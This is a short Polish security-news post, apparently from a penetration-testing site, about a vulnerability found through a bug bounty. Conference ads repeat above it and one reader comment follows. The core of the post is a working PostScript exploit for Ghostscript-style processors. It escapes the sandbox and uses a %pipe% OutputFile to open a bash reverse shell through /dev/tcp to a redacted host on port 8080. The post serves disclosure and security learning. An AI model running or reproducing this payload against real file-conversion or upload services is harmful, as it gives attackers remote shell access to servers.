Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!
Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!
Ciekawa podatność zgłoszona w ramach programu bug bounty.

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/███/8080 0>&1') currentdevice putdeviceprops
W podobnym klimacie opisywaliśmy kiedyś odczytywanie plików serwera przez “zwykły” upload pdf-ów.
–ms
znacie może przykład z plikem zaczynającym się z %PDF- ?